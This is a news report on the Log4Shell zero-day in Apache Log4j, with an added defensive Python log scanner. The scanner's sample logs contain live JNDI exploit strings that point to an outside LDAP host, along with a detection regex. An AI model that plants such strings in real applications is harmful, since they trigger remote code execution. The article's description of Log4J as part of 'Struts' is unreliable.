Critical 'Log4Shell' RCE zero-day exploited in large numbers

Source: Kevin Beaumont

Millions of applications use vulnerable Java logging library.

A simple to use exploit that can be used for remote code execution and to gain full control over millions of vulnerable enterprise systems through a Java logging library is currently being abused in large numbers, researchers warn.

The bug lies in Apache Foundation's open source Struts Log4J logging utility, in version 2.14 and earlier. 

It is caused by the Java Naming and Directory Interface (JNDI) application programming interface not protecting against lookups at attacker-controlled endpoints, including ones that use the Lightweight Directory Access Protocol (LDAP).

When a vulnerable application writes a log message, the default Log4j configuration causes the library to perform a lookup against a server; if an attacker controls that server, it can be set to return a malicious response.

The response can contain a remote Java class file which is injected into the server process and executed with the same privileges as the vulnerable application using the logging library.

A proof of concept was published on Twitter and on GitHub, and the vulnerability is rated a full 10 out of a possible 10 on the Common Vulnerability Scoring System (CVSS).

Computer emergency response teams around the world are now reporting active exploitation of the bug by automated systems.
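As an added illustration of what that automated exploitation looks like from the defender's side (example code, not from the article or from the Apache project): a small scanner that URL-decodes web server log lines and reports any embedded Log4j JNDI lookup string, with its scheme and target, so attempts can be triaged. The log lines and addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article): one carrying a
# JNDI lookup in the User-Agent, one carrying a percent-encoded lookup in the
# query string, and one benign request.
SAMPLE_LOGS = [
    '198.51.100.7 - - [10/Dec/2021:09:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:09:12:03 +0000] '
    '"GET /search?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%2Fx%7D HTTP/1.1" '
    '404 0 "-" "curl/7.79.1"',
    '198.51.100.9 - - [10/Dec/2021:09:12:05 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
]

# A Log4j message lookup has the form ${jndi:<scheme>:<target>}. The scheme
# is captured separately so a responder can tell LDAP from DNS or RMI callbacks;
# leading slashes after the scheme are dropped so the target is host[:port]/path.
JNDI_PATTERN = re.compile(r'\$\{jndi:([a-z]+):/*(.*?)\}', re.IGNORECASE)


def find_jndi_lookups(line):
    """Return a list of (scheme, target) pairs found in one log line.

    The line is URL-decoded first because web servers log the request line
    percent-encoded, which would otherwise hide the ${...} braces.
    """
    decoded = unquote(line)
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_PATTERN.finditer(decoded)]


def scan_logs(lines):
    """Return (line_number, scheme, target) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for scheme, target in find_jndi_lookups(line):
            hits.append((number, scheme, target))
    return hits


if __name__ == "__main__":
    for number, scheme, target in scan_logs(SAMPLE_LOGS):
        print(f"line {number}: JNDI {scheme} lookup -> {target}")
```

Run it over an exported access log one line at a time; a hit means the lookup string reached the application, not that the lookup succeeded, so the next step is checking whether the Log4j version in use is below 2.15.0.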

Researchers have so far confirmed that Apple's iCloud service, Valve's gaming platform Steam, and Microsoft's popular Minecraft game are vulnerable to the bug, which is named Log4Shell.

In Minecraft, testers have reported they've been able to trigger the bug by pasting the exploit string into a chat window.

The Apache Foundation has issued log4j version 2.15.0, which is not vulnerable to Log4Shell by default.

Administrators with older Log4j versions can also turn off the message lookups triggering the arbitrary code execution bug.

Chen Zhaojun of Alibaba's Cloud Security Team is credited with having found the bug.


